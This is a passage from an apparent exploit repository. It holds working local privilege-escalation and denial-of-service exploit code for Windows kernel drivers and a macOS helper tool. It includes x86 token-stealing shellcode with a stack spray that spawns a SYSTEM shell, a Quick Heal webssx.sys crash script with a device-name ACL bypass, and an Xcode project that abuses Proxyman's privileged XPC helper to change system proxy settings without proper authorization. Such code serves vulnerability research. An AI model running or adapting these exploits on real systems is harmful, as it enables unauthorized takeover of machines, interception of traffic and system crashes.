alloc == 0: 55 | print "[-] Error while writing our input buffer memory: %s" % alloc 56 | getLastError() 57 | sys.exit() 58 | 59 | def tokenstealingx86(RETVAL, extra = ""): 60 | """ 61 | Retrun a token stealing shellcode 62 | """ 63 | #Windows 7 SP1 x86 64 | KPROCESS = '\x50' 65 | TOKEN = '\xF8' 66 | UPID = '\xB4' 67 | APLINKS = '\xB8' 68 | 69 | shellcode = ( 70 | "\x60" # pushad 71 | "\x33\xc0" # xor eax,eax 72 | "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] 73 | "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] 74 | "\x8b\xc8" # mov ecx,eax 75 | "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS] 76 | "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS 77 | "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4 78 | "\x75\xec" # jne 0xe 79 | "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN] 80 | "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx 81 | "\x61" # popad 82 | ) 83 | 84 | shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack 85 | 86 | if RETVAL == "": 87 | shellcode += "\xc3" #retn 88 | else: 89 | shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 90 | 91 | return shellcode 92 | 93 | 94 | if __name__ == '__main__': 95 | print "[*] HackSysExtremeVulnerableDriver uninitialized stack variable privilige escalation" 96 | 97 | IOCTL_VULN = ctl_code(0x80B) #HACKSYS_EVD_IOCTL_UNINITIALIZED_STACK_VARIABLE 98 | DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver" 99 | dwReturn = c_ulong() 100 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 101 | inputbuffer = 0x41410000 #memory address of the input buffer 102 | inputbuffer_size = 0x100 103 | outputbuffer_size = 0x0 104 | IoStatusBlock = c_ulong() 105 | 106 | #allocate shellcode in memory 107 | SHELLCODE = tokenstealingx86(RETVAL = '') 108 | stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (0x1000 - 0x10 - len(SHELLCODE)) 109 | alloc_memory(0x42424242, stuff, 0x1000) 110 | 111 | #allocate input memory 112 | alloc_memory(0x41410000, "\x42" * 0x1000, 0x1000) 113 | 114 | #spray the stack 115 | #NtMapUserPhysicalPages( arbitrary r-3 pointer, 1024, 0x41414141 * 1024 ); 116 | for i in range(0,1000): 117 | """ 118 | NTSTATUS NtMapUserPhysicalPages ( 119 | __in PVOID VirtualAddress, 120 | __in ULONG_PTR NumberOfPages, 121 | __in_ecount_opt(NumberOfPages) PULONG_PTR UserPfnArray 122 | ) 123 | """ 124 | ntdll.NtMapUserPhysicalPages(None,1024,0x41410000) 125 | 126 | if driver_handle: 127 | #print "[*] Sending IOCTL and data to the driver..." 128 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 129 | None, 130 | None, 131 | None, 132 | byref(IoStatusBlock), 133 | IOCTL_VULN, 134 | inputbuffer, 135 | inputbuffer_size, 136 | None, 137 | 0x0 138 | ) 139 | if 'system' in os.popen('whoami').read(): 140 | print "[+] Getting system shell..." 141 | os.system("cmd.exe") 142 | else: 143 | print '[-] Failed to elevate privileges' -------------------------------------------------------------------------------- /cve-2015-8285_Quick_Heal_16_webssx.sys/qh-webssx-bsod.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | import sys 4 | 5 | kernel32 = windll.kernel32 6 | ntdll = windll.ntdll 7 | 8 | #GLOBAL VARIABLES 9 | 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | PAGE_EXECUTE_READWRITE = 0x00000040 13 | STATUS_SUCCESS = 0 14 | 15 | def alloc_in(base,evil_size): 16 | """ Allocate input buffer """ 17 | print "[*] Allocating input buffer" 18 | baseadd = c_int(base) 19 | size = c_int(evil_size) 20 | evil_input = "\x41" * 0x10 21 | evil_input += "\x42\x01\x42\x42" #to trigger memcpy 22 | evil_input += "\x42" * (0x130-0x14) 23 | evil_input += "\xc0\xff\xff\xff" #this will cause memcpy to fail, and trigger BSOD 24 | evil_input += "\x43" * (evil_size-len(evil_input)) 25 | ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, 26 | POINTER(c_int), c_int, c_int] 27 | dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, 28 | byref(size), 29 | MEM_RESERVE|MEM_COMMIT, 30 | PAGE_EXECUTE_READWRITE) 31 | if dwStatus != STATUS_SUCCESS: 32 | print "[-] Error while allocating memory: %s" % hex(dwStatus+0xffffffff) 33 | sys.exit() 34 | written = c_ulong() 35 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base, evil_input, len(evil_input), byref(written)) 36 | if alloc == 0: 37 | print "[-] Error while writing our input buffer memory: %s" %\ 38 | alloc 39 | sys.exit() 40 | 41 | if __name__ == '__main__': 42 | print "[*] webssx BSOD" 43 | 44 | GENERIC_READ = 0x80000000 45 | GENERIC_WRITE = 0x40000000 46 | OPEN_EXISTING = 0x3 47 | IOCTL_VULN = 0x830020FC 48 | DEVICE_NAME = "\\\\.\\webssx\some" #add "some" to bypass ACL restriction, (FILE_DEVICE_SECURE_OPEN is not applied to the driver) 49 | dwReturn = c_ulong() 50 | driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) 51 | 52 | inputbuffer = 0x41414141 #memory address of the input buffer 53 | inputbuffer_size = 0x1000 54 | outputbuffer_size = 0x0 55 | outputbuffer = 0x20000000 56 | alloc_in(inputbuffer,inputbuffer_size) 57 | IoStatusBlock = c_ulong() 58 | if driver_handle: 59 | print "[*] Talking to the driver sending vulnerable IOCTL..." 60 | dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, 61 | None, 62 | None, 63 | None, 64 | byref(IoStatusBlock), 65 | IOCTL_VULN, 66 | inputbuffer, 67 | inputbuffer_size, 68 | outputbuffer, 69 | outputbuffer_size 70 | ) 71 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 50; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 4129560423A6EDFF0051D602 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 4129560323A6EDFF0051D602 /* AppDelegate.m */; }; 11 | 4129560723A6EDFF0051D602 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = 4129560623A6EDFF0051D602 /* ViewController.m */; }; 12 | 4129560923A6EE020051D602 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 4129560823A6EE020051D602 /* Assets.xcassets */; }; 13 | 4129560C23A6EE020051D602 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 4129560A23A6EE020051D602 /* Main.storyboard */; }; 14 | 4129560F23A6EE020051D602 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 4129560E23A6EE020051D602 /* main.m */; }; 15 | /* End PBXBuildFile section */ 16 | 17 | /* Begin PBXFileReference section */ 18 | 412955FF23A6EDFF0051D602 /* PMCocoa.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = PMCocoa.app; sourceTree = BUILT_PRODUCTS_DIR; }; 19 | 4129560223A6EDFF0051D602 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 20 | 4129560323A6EDFF0051D602 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 21 | 4129560523A6EDFF0051D602 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 22 | 4129560623A6EDFF0051D602 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 23 | 4129560823A6EE020051D602 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 24 | 4129560B23A6EE020051D602 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 25 | 4129560D23A6EE020051D602 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 26 | 4129560E23A6EE020051D602 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 27 | 4129561023A6EE020051D602 /* PMCocoa.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = PMCocoa.entitlements; sourceTree = ""; }; 28 | /* End PBXFileReference section */ 29 | 30 | /* Begin PBXFrameworksBuildPhase section */ 31 | 412955FC23A6EDFF0051D602 /* Frameworks */ = { 32 | isa = PBXFrameworksBuildPhase; 33 | buildActionMask = 2147483647; 34 | files = ( 35 | ); 36 | runOnlyForDeploymentPostprocessing = 0; 37 | }; 38 | /* End PBXFrameworksBuildPhase section */ 39 | 40 | /* Begin PBXGroup section */ 41 | 412955F623A6EDFF0051D602 = { 42 | isa = PBXGroup; 43 | children = ( 44 | 4129560123A6EDFF0051D602 /* PMCocoa */, 45 | 4129560023A6EDFF0051D602 /* Products */, 46 | ); 47 | sourceTree = ""; 48 | }; 49 | 4129560023A6EDFF0051D602 /* Products */ = { 50 | isa = PBXGroup; 51 | children = ( 52 | 412955FF23A6EDFF0051D602 /* PMCocoa.app */, 53 | ); 54 | name = Products; 55 | sourceTree = ""; 56 | }; 57 | 4129560123A6EDFF0051D602 /* PMCocoa */ = { 58 | isa = PBXGroup; 59 | children = ( 60 | 4129560223A6EDFF0051D602 /* AppDelegate.h */, 61 | 4129560323A6EDFF0051D602 /* AppDelegate.m */, 62 | 4129560523A6EDFF0051D602 /* ViewController.h */, 63 | 4129560623A6EDFF0051D602 /* ViewController.m */, 64 | 4129560823A6EE020051D602 /* Assets.xcassets */, 65 | 4129560A23A6EE020051D602 /* Main.storyboard */, 66 | 4129560D23A6EE020051D602 /* Info.plist */, 67 | 4129560E23A6EE020051D602 /* main.m */, 68 | 4129561023A6EE020051D602 /* PMCocoa.entitlements */, 69 | ); 70 | path = PMCocoa; 71 | sourceTree = ""; 72 | }; 73 | /* End PBXGroup section */ 74 | 75 | /* Begin PBXNativeTarget section */ 76 | 412955FE23A6EDFF0051D602 /* PMCocoa */ = { 77 | isa = PBXNativeTarget; 78 | buildConfigurationList = 4129561323A6EE020051D602 /* Build configuration list for PBXNativeTarget "PMCocoa" */; 79 | buildPhases = ( 80 | 412955FB23A6EDFF0051D602 /* Sources */, 81 | 412955FC23A6EDFF0051D602 /* Frameworks */, 82 | 412955FD23A6EDFF0051D602 /* Resources */, 83 | ); 84 | buildRules = ( 85 | ); 86 | dependencies = ( 87 | ); 88 | name = PMCocoa; 89 | productName = PMCocoa; 90 | productReference = 412955FF23A6EDFF0051D602 /* PMCocoa.app */; 91 | productType = "com.apple.product-type.application"; 92 | }; 93 | /* End PBXNativeTarget section */ 94 | 95 | /* Begin PBXProject section */ 96 | 412955F723A6EDFF0051D602 /* Project object */ = { 97 | isa = PBXProject; 98 | attributes = { 99 | LastUpgradeCheck = 1130; 100 | ORGANIZATIONNAME = csaba; 101 | TargetAttributes = { 102 | 412955FE23A6EDFF0051D602 = { 103 | CreatedOnToolsVersion = 11.3; 104 | }; 105 | }; 106 | }; 107 | buildConfigurationList = 412955FA23A6EDFF0051D602 /* Build configuration list for PBXProject "PMCocoa" */; 108 | compatibilityVersion = "Xcode 9.3"; 109 | developmentRegion = en; 110 | hasScannedForEncodings = 0; 111 | knownRegions = ( 112 | en, 113 | Base, 114 | ); 115 | mainGroup = 412955F623A6EDFF0051D602; 116 | productRefGroup = 4129560023A6EDFF0051D602 /* Products */; 117 | projectDirPath = ""; 118 | projectRoot = ""; 119 | targets = ( 120 | 412955FE23A6EDFF0051D602 /* PMCocoa */, 121 | ); 122 | }; 123 | /* End PBXProject section */ 124 | 125 | /* Begin PBXResourcesBuildPhase section */ 126 | 412955FD23A6EDFF0051D602 /* Resources */ = { 127 | isa = PBXResourcesBuildPhase; 128 | buildActionMask = 2147483647; 129 | files = ( 130 | 4129560923A6EE020051D602 /* Assets.xcassets in Resources */, 131 | 4129560C23A6EE020051D602 /* Main.storyboard in Resources */, 132 | ); 133 | runOnlyForDeploymentPostprocessing = 0; 134 | }; 135 | /* End PBXResourcesBuildPhase section */ 136 | 137 | /* Begin PBXSourcesBuildPhase section */ 138 | 412955FB23A6EDFF0051D602 /* Sources */ = { 139 | isa = PBXSourcesBuildPhase; 140 | buildActionMask = 2147483647; 141 | files = ( 142 | 4129560723A6EDFF0051D602 /* ViewController.m in Sources */, 143 | 4129560F23A6EE020051D602 /* main.m in Sources */, 144 | 4129560423A6EDFF0051D602 /* AppDelegate.m in Sources */, 145 | ); 146 | runOnlyForDeploymentPostprocessing = 0; 147 | }; 148 | /* End PBXSourcesBuildPhase section */ 149 | 150 | /* Begin PBXVariantGroup section */ 151 | 4129560A23A6EE020051D602 /* Main.storyboard */ = { 152 | isa = PBXVariantGroup; 153 | children = ( 154 | 4129560B23A6EE020051D602 /* Base */, 155 | ); 156 | name = Main.storyboard; 157 | sourceTree = ""; 158 | }; 159 | /* End PBXVariantGroup section */ 160 | 161 | /* Begin XCBuildConfiguration section */ 162 | 4129561123A6EE020051D602 /* Debug */ = { 163 | isa = XCBuildConfiguration; 164 | buildSettings = { 165 | ALWAYS_SEARCH_USER_PATHS = NO; 166 | CLANG_ANALYZER_NONNULL = YES; 167 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 168 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 169 | CLANG_CXX_LIBRARY = "libc++"; 170 | CLANG_ENABLE_MODULES = YES; 171 | CLANG_ENABLE_OBJC_ARC = YES; 172 | CLANG_ENABLE_OBJC_WEAK = YES; 173 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 174 | CLANG_WARN_BOOL_CONVERSION = YES; 175 | CLANG_WARN_COMMA = YES; 176 | CLANG_WARN_CONSTANT_CONVERSION = YES; 177 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 178 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 179 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 180 | CLANG_WARN_EMPTY_BODY = YES; 181 | CLANG_WARN_ENUM_CONVERSION = YES; 182 | CLANG_WARN_INFINITE_RECURSION = YES; 183 | CLANG_WARN_INT_CONVERSION = YES; 184 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 185 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 186 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 187 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 188 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 189 | CLANG_WARN_STRICT_PROTOTYPES = YES; 190 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 191 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 192 | CLANG_WARN_UNREACHABLE_CODE = YES; 193 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 194 | COPY_PHASE_STRIP = NO; 195 | DEBUG_INFORMATION_FORMAT = dwarf; 196 | ENABLE_STRICT_OBJC_MSGSEND = YES; 197 | ENABLE_TESTABILITY = YES; 198 | GCC_C_LANGUAGE_STANDARD = gnu11; 199 | GCC_DYNAMIC_NO_PIC = NO; 200 | GCC_NO_COMMON_BLOCKS = YES; 201 | GCC_OPTIMIZATION_LEVEL = 0; 202 | GCC_PREPROCESSOR_DEFINITIONS = ( 203 | "DEBUG=1", 204 | "$(inherited)", 205 | ); 206 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 207 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 208 | GCC_WARN_UNDECLARED_SELECTOR = YES; 209 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 210 | GCC_WARN_UNUSED_FUNCTION = YES; 211 | GCC_WARN_UNUSED_VARIABLE = YES; 212 | MACOSX_DEPLOYMENT_TARGET = 10.15; 213 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 214 | MTL_FAST_MATH = YES; 215 | ONLY_ACTIVE_ARCH = YES; 216 | SDKROOT = macosx; 217 | }; 218 | name = Debug; 219 | }; 220 | 4129561223A6EE020051D602 /* Release */ = { 221 | isa = XCBuildConfiguration; 222 | buildSettings = { 223 | ALWAYS_SEARCH_USER_PATHS = NO; 224 | CLANG_ANALYZER_NONNULL = YES; 225 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 226 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 227 | CLANG_CXX_LIBRARY = "libc++"; 228 | CLANG_ENABLE_MODULES = YES; 229 | CLANG_ENABLE_OBJC_ARC = YES; 230 | CLANG_ENABLE_OBJC_WEAK = YES; 231 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 232 | CLANG_WARN_BOOL_CONVERSION = YES; 233 | CLANG_WARN_COMMA = YES; 234 | CLANG_WARN_CONSTANT_CONVERSION = YES; 235 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 236 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 237 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 238 | CLANG_WARN_EMPTY_BODY = YES; 239 | CLANG_WARN_ENUM_CONVERSION = YES; 240 | CLANG_WARN_INFINITE_RECURSION = YES; 241 | CLANG_WARN_INT_CONVERSION = YES; 242 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 243 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 244 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 245 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 246 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 247 | CLANG_WARN_STRICT_PROTOTYPES = YES; 248 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 249 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 250 | CLANG_WARN_UNREACHABLE_CODE = YES; 251 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 252 | COPY_PHASE_STRIP = NO; 253 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 254 | ENABLE_NS_ASSERTIONS = NO; 255 | ENABLE_STRICT_OBJC_MSGSEND = YES; 256 | GCC_C_LANGUAGE_STANDARD = gnu11; 257 | GCC_NO_COMMON_BLOCKS = YES; 258 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 259 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 260 | GCC_WARN_UNDECLARED_SELECTOR = YES; 261 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 262 | GCC_WARN_UNUSED_FUNCTION = YES; 263 | GCC_WARN_UNUSED_VARIABLE = YES; 264 | MACOSX_DEPLOYMENT_TARGET = 10.15; 265 | MTL_ENABLE_DEBUG_INFO = NO; 266 | MTL_FAST_MATH = YES; 267 | SDKROOT = macosx; 268 | }; 269 | name = Release; 270 | }; 271 | 4129561423A6EE020051D602 /* Debug */ = { 272 | isa = XCBuildConfiguration; 273 | buildSettings = { 274 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 275 | CODE_SIGN_ENTITLEMENTS = PMCocoa/PMCocoa.entitlements; 276 | CODE_SIGN_STYLE = Automatic; 277 | COMBINE_HIDPI_IMAGES = YES; 278 | DEVELOPMENT_TEAM = 33YRLYRBYV; 279 | ENABLE_HARDENED_RUNTIME = NO; 280 | INFOPLIST_FILE = PMCocoa/Info.plist; 281 | LD_RUNPATH_SEARCH_PATHS = ( 282 | "$(inherited)", 283 | "@executable_path/../Frameworks", 284 | ); 285 | PRODUCT_BUNDLE_IDENTIFIER = com.csaba.PMCocoa; 286 | PRODUCT_NAME = "$(TARGET_NAME)"; 287 | }; 288 | name = Debug; 289 | }; 290 | 4129561523A6EE020051D602 /* Release */ = { 291 | isa = XCBuildConfiguration; 292 | buildSettings = { 293 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 294 | CODE_SIGN_ENTITLEMENTS = PMCocoa/PMCocoa.entitlements; 295 | CODE_SIGN_STYLE = Automatic; 296 | COMBINE_HIDPI_IMAGES = YES; 297 | DEVELOPMENT_TEAM = 33YRLYRBYV; 298 | ENABLE_HARDENED_RUNTIME = NO; 299 | INFOPLIST_FILE = PMCocoa/Info.plist; 300 | LD_RUNPATH_SEARCH_PATHS = ( 301 | "$(inherited)", 302 | "@executable_path/../Frameworks", 303 | ); 304 | PRODUCT_BUNDLE_IDENTIFIER = com.csaba.PMCocoa; 305 | PRODUCT_NAME = "$(TARGET_NAME)"; 306 | }; 307 | name = Release; 308 | }; 309 | /* End XCBuildConfiguration section */ 310 | 311 | /* Begin XCConfigurationList section */ 312 | 412955FA23A6EDFF0051D602 /* Build configuration list for PBXProject "PMCocoa" */ = { 313 | isa = XCConfigurationList; 314 | buildConfigurations = ( 315 | 4129561123A6EE020051D602 /* Debug */, 316 | 4129561223A6EE020051D602 /* Release */, 317 | ); 318 | defaultConfigurationIsVisible = 0; 319 | defaultConfigurationName = Release; 320 | }; 321 | 4129561323A6EE020051D602 /* Build configuration list for PBXNativeTarget "PMCocoa" */ = { 322 | isa = XCConfigurationList; 323 | buildConfigurations = ( 324 | 4129561423A6EE020051D602 /* Debug */, 325 | 4129561523A6EE020051D602 /* Release */, 326 | ); 327 | defaultConfigurationIsVisible = 0; 328 | defaultConfigurationName = Release; 329 | }; 330 | /* End XCConfigurationList section */ 331 | }; 332 | rootObject = 412955F723A6EDFF0051D602 /* Project object */; 333 | } 334 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.xcworkspace/xcuserdata/csaby.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/theevilbit/exploits/2f5293f84c20b5813f9b253c883b5fc6e6989a5b/cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/project.xcworkspace/xcuserdata/csaby.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa.xcodeproj/xcuserdata/csaby.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | PMCocoa.xcscheme_^#shared#^_ 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : NSObject 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // PMCocoa 4 | // 5 | // Created by csaby on 2019. 12. 15.. 6 | // Copyright © 2019. csaba. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | #import 11 | 12 | static NSString* XPCHelperMachServiceName = @"com.proxyman.NSProxy.HelperTool"; 13 | 14 | @protocol HelperToolProtocol 15 | - (void)setProxySystemPreferencesWithAuthorization:(NSData *)arg1 enabled:(BOOL)arg2 host:(NSString *)arg3 port:(NSString *)arg4 reply:(void (^)(NSError *, BOOL))arg5; 16 | - (void)getVersionWithReply:(void (^)(NSString *))arg1; 17 | - (void)connectWithEndpointReply:(void (^)(NSXPCListenerEndpoint *))arg1; 18 | @end 19 | 20 | 21 | @interface AppDelegate () 22 | 23 | @end 24 | 25 | @implementation AppDelegate 26 | 27 | - (void)applicationDidFinishLaunching:(NSNotification *)aNotification { 28 | // Insert code here to initialize your application 29 | NSData *authorization; 30 | OSStatus err; 31 | AuthorizationExternalForm extForm; 32 | AuthorizationRef authref; 33 | NSString *my_proxy = @"127.0.0.1"; 34 | NSString *my_port = @"3333"; 35 | Boolean enab = true; 36 | 37 | err = AuthorizationCreate(NULL, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &authref); 38 | const char* str = CFStringGetCStringPtr(SecCopyErrorMessageString(err, nil), kCFStringEncodingMacRoman); 39 | printf("OSStatus: %s\n",str); 40 | if (err == errAuthorizationSuccess) 41 | { 42 | err = AuthorizationMakeExternalForm(authref, &extForm); 43 | str = CFStringGetCStringPtr(SecCopyErrorMessageString(err, nil), kCFStringEncodingMacRoman); 44 | printf("OSStatus: %s\n",str); 45 | } 46 | if (err == errAuthorizationSuccess) 47 | { 48 | authorization = [[NSData alloc] initWithBytes:&extForm length:sizeof(extForm)]; 49 | str = CFStringGetCStringPtr(SecCopyErrorMessageString(err, nil), kCFStringEncodingMacRoman); 50 | printf("OSStatus: %s\n",str); 51 | } 52 | assert(err == errAuthorizationSuccess); 53 | 54 | NSString* _serviceName = XPCHelperMachServiceName; 55 | NSXPCConnection* _agentConnection = [[NSXPCConnection alloc] initWithMachServiceName:_serviceName options:4096]; 56 | [_agentConnection setRemoteObjectInterface:[NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)]]; 57 | [_agentConnection resume]; 58 | 59 | id obj = [_agentConnection remoteObjectProxyWithErrorHandler:^(NSError* error) 60 | { 61 | (void)error; 62 | NSLog(@"Connection Failure"); 63 | }]; 64 | NSLog(@"obj: %@", obj); 65 | NSLog(@"conn: %@", _agentConnection); 66 | [obj setProxySystemPreferencesWithAuthorization:authorization enabled:enab host:my_proxy port:my_port reply:^(NSError * err, BOOL b){ 67 | NSLog(@"Response, %@", err); 68 | }]; 69 | [obj setProxySystemPreferencesWithAuthorization:authorization enabled:enab host:my_proxy port:my_port reply:^(NSError * err, BOOL b){ 70 | NSLog(@"Response, %@", err); 71 | }]; 72 | NSLog(@"Done"); 73 | } 74 | 75 | 76 | - (void)applicationWillTerminate:(NSNotification *)aNotification { 77 | // Insert code here to tear down your application 78 | } 79 | 80 | 81 | @end 82 | -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "mac", 5 | "size" : "16x16", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "mac", 10 | "size" : "16x16", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "idiom" : "mac", 15 | "size" : "32x32", 16 | "scale" : "1x" 17 | }, 18 | { 19 | "idiom" : "mac", 20 | "size" : "32x32", 21 | "scale" : "2x" 22 | }, 23 | { 24 | "idiom" : "mac", 25 | "size" : "128x128", 26 | "scale" : "1x" 27 | }, 28 | { 29 | "idiom" : "mac", 30 | "size" : "128x128", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "idiom" : "mac", 35 | "size" : "256x256", 36 | "scale" : "1x" 37 | }, 38 | { 39 | "idiom" : "mac", 40 | "size" : "256x256", 41 | "scale" : "2x" 42 | }, 43 | { 44 | "idiom" : "mac", 45 | "size" : "512x512", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "mac", 50 | "size" : "512x512", 51 | "scale" : "2x" 52 | } 53 | ], 54 | "info" : { 55 | "version" : 1, 56 | "author" : "xcode" 57 | } 58 | } -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /cve-2019-20057_proxyman_privhelper/PMCocoa/PMCocoa/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 